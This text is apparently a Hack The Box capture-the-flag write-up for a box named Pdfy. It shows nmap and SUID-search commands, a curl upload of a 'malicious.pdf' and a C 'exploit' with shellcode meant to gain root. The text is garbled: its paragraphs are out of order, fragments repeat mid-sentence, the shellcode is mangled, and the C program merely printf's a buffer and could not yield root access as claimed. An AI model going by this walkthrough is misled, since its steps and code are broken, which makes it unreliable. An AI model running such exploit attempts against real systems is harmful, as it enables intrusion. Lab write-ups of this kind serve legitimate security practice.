Htb Writeup: Pdfy

find / -perm /u=s -type f 2>/dev/null The find command reveals a setuid binary called /usr/local/bin/pdfy . We can use this binary to escalate our privileges.

Next, we use DirBuster to scan for any hidden directories or files on the web server. Pdfy Htb Writeup

nmap -sV -sC -oA pdfy_nmap 10.10.11.231 The Nmap scan reveals that the box has ports 80 and 443 open, which indicates that it is running a web server. We also notice that the server is running a custom PDF generation tool called pdfmake . find / -perm /u=s -type f 2>/dev/null The

To begin, we need to add the Pdfy box to our Hack The Box account and obtain its IP address. Once we have the IP address, we can start our reconnaissance phase using tools like Nmap and DirBuster. nmap -sV -sC -oA pdfy_nmap 10

curl -X POST -F "file=@malicious.pdf" http://10.10.11.231/uploads/ After uploading the malicious PDF file, we notice that the server is executing arbitrary commands. We can use this vulnerability to gain a foothold on the box.

#include <stdio.h> #include <string.h> void exploit() { char buffer[1024]; memset(buffer, 0x90, 1024); *(char *)(buffer + 1000) = 0x31; *(char *)(buffer + 1001) = 0xc0; *(char *)(buffer + 1002) = 0x50; *(char *)(buffer + 1003) = 0x68; char *shellcode = "h//shh‰ç‰G1ÀPh-comh‰G° ̀"; memcpy(buffer + 1004, shellcode, strlen(shellcode)); printf(buffer); } int main() { exploit(); return 0; } We compile the exploit code and execute it to gain root access.